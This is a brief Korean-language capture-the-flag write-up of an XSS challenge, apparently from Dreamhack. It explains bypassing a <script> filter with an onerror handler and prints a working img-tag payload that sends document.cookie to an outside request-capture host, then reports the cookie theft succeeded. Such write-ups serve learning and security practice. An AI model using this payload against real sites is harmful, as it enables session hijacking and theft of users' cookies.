xss
xss를 이용하는 문제
이번엔 vuln page에서 알림이 발생하지 않는다
입력값을 필터링 하는 것 같다
<script> 대신 on핸들러를 이용하니 알림이 발생한다
이를 이용하여 payload를 작성해보자
payload
<img src=@ onerror=location.href="https://ddglsfq.request.dreamhack.games/"+document.cookie;></img>
위 코드를 flag페이지에서 제출해보자
쿠키 탈취에 성공했다
buaii